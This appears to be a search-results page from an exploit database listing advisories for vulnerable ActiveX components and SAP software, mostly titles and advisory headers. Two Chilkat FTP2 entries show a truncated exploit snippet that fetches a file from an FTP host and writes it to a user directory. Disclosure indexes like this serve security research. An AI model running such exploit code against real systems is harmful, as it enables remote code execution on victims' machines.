174 matches found
Chilkat Software FTP2 - ActiveX Component Remote Code Execution
obj.UnlockComponent"suntzu"; //needed for file transfer operations, type whatever here obj.Port=21; //configure ftp connection obj.Hostname="192.168.0.1"; //change here obj.ConnectTimeout=5; obj.Passive=1; var x; x=obj.Connect; if x==1 x = obj.GetFile"suntzu.txt","c:/Users/All...
Chilkat Software FTP2 ActiveX Code Execution
obj.UnlockComponent"suntzu"; //needed for file transfer operations, type whatever here obj.Port=21; //configure ftp connection obj.Hostname="192.168.0.1"; //change here obj.ConnectTimeout=5; obj.Passive=1; var x; x=obj.Connect; if x==1 x = obj.GetFile"suntzu.txt","c:/Users/All...
SAP Crystal Reports 2008 — ActiveX Insecure Methods
Application: SAP Crystal Report Server 2008 Versions Affected: SAP Crystal Report Server 2008 Vendor URL: http://www.sap.com Exploits: YES Bugs: Insecure methods Reported: 09.03.2010 Vendor response: 10.03.2010 Date of SAP Security Note Published: 8.10.2010 Date of Public Advisory: 14.01.2011...
SmartCode ServerX VNC Server ActiveX 1.1.5.0 - scvncsrvx.dll Denial of Service
SmartCode ServerX VNC Server ActiveX 1.1.5.0 - scvncsrvx.dll Denial of Service Title: SmartCode ServerX VNC Server ActiveX 1.1.5.0 scvncsrvx.dll DoS Exploit Vendor: SmartCode Solutions Product Web Page: htt://www.s-code.com Version Tested: 1.1.5.0 Summary: SmartCode ServerX VNC Server control is ...
SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS
Exploit for windows platform in category dos / poc ================================================================ SmartCode ServerX VNC Server ActiveX 1.1.5.0 scvncsrvx.dll DoS ================================================================ Vendor: SmartCode Solutions Product Web Page:...
SmartCode ServerX VNC Server ActiveX 1.1.5.0 - 'scvncsrvx.dll' Denial of Service
Title: SmartCode ServerX VNC Server ActiveX 1.1.5.0 scvncsrvx.dll DoS Exploit Vendor: SmartCode Solutions Product Web Page: htt://www.s-code.com Version Tested: 1.1.5.0 Summary: SmartCode ServerX VNC Server control is a VNC server implemented as an ActiveX component, which makes it extremely easy...
AnNoText ADVOAkte multiple security vulnerabilities
Buffer overflow and files overwriting in ActiveX component...
Liquid XML Studio LtXmlComHelp8.dll ActiveX OpenFile Buffer Overflow
Liquid Technologies develops and maintains an XML editor, Liquid XML Studio. Liquid XML is composed of an XML developers toolkit and IDE, enabling developers to design and develop XML Schema and applications. Bundled with the application is an ActiveX component that is registered on the system...
Symantec Antivirus Client Proxy 10 Buffer Overflow
Exploit for unknown platform in category local exploits ================================================== Symantec Antivirus Client Proxy 10 Buffer Overflow ================================================== Application: Symantec Antivirus Client Proxy Versions Affected: Version 10 Vendor URL:...
TVUPlayer 2.4.9beta1 Active-X Insecure Method
DSECRG-09-065 TuvNetworks TVUPlayer ActiveX component - Insecure method TVUPlayer contains ActiveX component PlayerOcx which contains insecure method that can overwrite any unhidden file in the system. Application: TVUPlayer Versions Affected: Tested on v2.4.9beta1build1797 Vendor URL:...
[DSECRG-09-065] TVUPlayer PlayerOcx.ocx ActiveX - Insecure method
ActiveX component contains insecure method that can overwrite any file in system Digital Security Research Group DSecRG Advisory DSECRG-09-065 Application: TVUPlayer Versions Affected: Tested on v2.4.9beta1build1797 Vendor URL: www.tvunetworks.com Bugs: insecure method, File overwriting Exploits:...
SAP RFC SDK — Memory Corruption
Application: RFC SDK SAP AG Versions Affected: RFC SDK 6400-7.20 and SAP GUI 7.10-7.20 Vendor URL: Bugs: Buffer Overflow Exploits: YES Reported: 16.12.2009 Vendor response: 16.12.2009 Date of SAP Security Note Published: 14.09.2010 Date of Public Advisory: 14.12.2010 Author: Alexey Sintsov...
SAP RFC SDK — Format String
Application: RFC SDK SAP AG Versions Affected: RFC SDK 6.40 7.11 Vendor URL: Bugs: Format String Vulnerability Exploits: YES Reported: 15.12.2009 Vendor response: 18.12.2009 Date of SAP Security Note Published: 14.09.2010 Date of Public Advisory: 14.12.2010 Author: Alexey Sintsov Description SAP...
SAP GUI 7.1 — Insecure Method, Code execution
Application: SAP GUI Versions Affected: SAP GUI SAP GUI 7.1 Vendor URL: Bugs: Insecure method, Code Execution Exploits: YES Reported: 16.10.2009 Vendor response: 27.10.2009 Date of Public Advisory: 23.03.2010 Author: Sintsov Alexey Description Insecure method was founded in SAPBExCommonResources...
Microsoft Indexing Service ActiveX Memory Corruption (MS09-057; CVE-2009-2507)
The Microsoft Windows Indexing Service is a base service that extracts content from files and constructs an indexed catalog to facilitate efficient and rapid searching. A remote code execution vulnerability has been reported in the Microsoft Indexing Service. The vulnerability is caused by an...
EnjoySAP 6.4 7.1 File Overwrite
No description provided by source. Digital Security Research Group DSecRG Advisory DSECRG-09-044 Application: EnjoySAP, SAP GUI for Windows 6.4 and 7.1 Versions Affected: Tested on 7100.2.7.1038 PL 7 Vendor URL: http://SAP.com Bugs: insecure method, File owervriting Exploits: YES Reported:...
EnjoySAP 6.4/7.1 - File Overwrite
Digital Security Research Group DSecRG Advisory DSECRG-09-044 Application: EnjoySAP, SAP GUI for Windows 6.4 and 7.1 Versions Affected: Tested on 7100.2.7.1038 PL 7 Vendor URL: http://SAP.com Bugs: insecure method, File owervriting Exploits: YES Reported: 02.07.2009 Vendor response: 02.07.2009 Da...
Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit
!-- I - TITLE Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect ActiveX stack overflow exploit II - SUMMARY Description: Remotely exploitable buffer overflow in ActiveX component Quiksoft EasyMail 6.0.3.0 allows for the arbitrary code execution in the user context. Author: Sebastian...
Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX BOF Exploit
Exploit for windows platform in category remote exploits ============================================================ Quiksoft EasyMail 6.0.3.0 imap connect ActiveX BOF Exploit ============================================================ !-- I - TITLE Security advisory: Quiksoft EasyMail 6.0.3.0...
Integrity Clientless Security (ICS) Update 3.7.267.0
Check Point Integrity ™ Clientless Security ICS protects your Web site by detecting and disabling spyware processes and allowing you to enforce security policies before a user logs onto your network. Using ICS you can prevent users with potentially harmful software from accessing your Web site, a...